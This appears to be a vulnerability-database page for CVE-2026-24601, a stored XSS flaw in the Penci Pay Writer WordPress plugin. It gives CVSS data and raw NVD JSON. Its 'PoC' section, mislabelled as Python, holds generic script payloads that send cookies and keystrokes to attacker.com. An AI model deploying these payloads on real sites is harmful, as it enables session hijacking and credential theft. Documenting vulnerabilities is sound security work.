Security Vulnerability Report
中文
CVE-2026-24601 CVSS 6.5 MEDIUM

CVE-2026-24601

Published: 2026-01-23 15:16:18
Last Modified: 2026-04-28 15:16:18

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Pay Writer penci-pay-writer allows Stored XSS.This issue affects Penci Pay Writer: from n/a through <= 1.5.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Penci Pay Writer <= 1.5 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-24601 PoC - Stored XSS in Penci Pay Writer --> <!-- Author: Security Researcher --> <!-- Target: WordPress with Penci Pay Writer Plugin <= 1.5 --> <!-- Step 1: Inject malicious XSS payload via plugin's input field --> <!-- This payload steals session cookies and sends to attacker server --> <script> // Create image element for exfiltration var img = document.createElement('img'); img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie); img.style.display = 'none'; document.body.appendChild(img); </script> <!-- Alternative payload - Session hijacking --> <svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))> <!-- Alternative payload - Keylogger --> <script> document.addEventListener('keypress', function(e) { fetch('https://attacker.com/keys?k=' + e.key); }); </script> <!-- Simple alert for verification --> <script>alert('XSS Vulnerability Confirmed - CVE-2026-24601')</script> <!-- Payload can be injected in comment, post content, or plugin-specific fields -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24601", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:18.427", "lastModified": "2026-04-28T15:16:18.447", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Pay Writer penci-pay-writer allows Stored XSS.This issue affects Penci Pay Writer: from n/a through <= 1.5."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en PenciDesign Penci Pay Writer penci-pay-writer permite XSS Almacenado. Este problema afecta a Penci Pay Writer: desde n/a hasta &lt;= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/penci-pay-writer/vulnerability/wordpress-penci-pay-writer-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}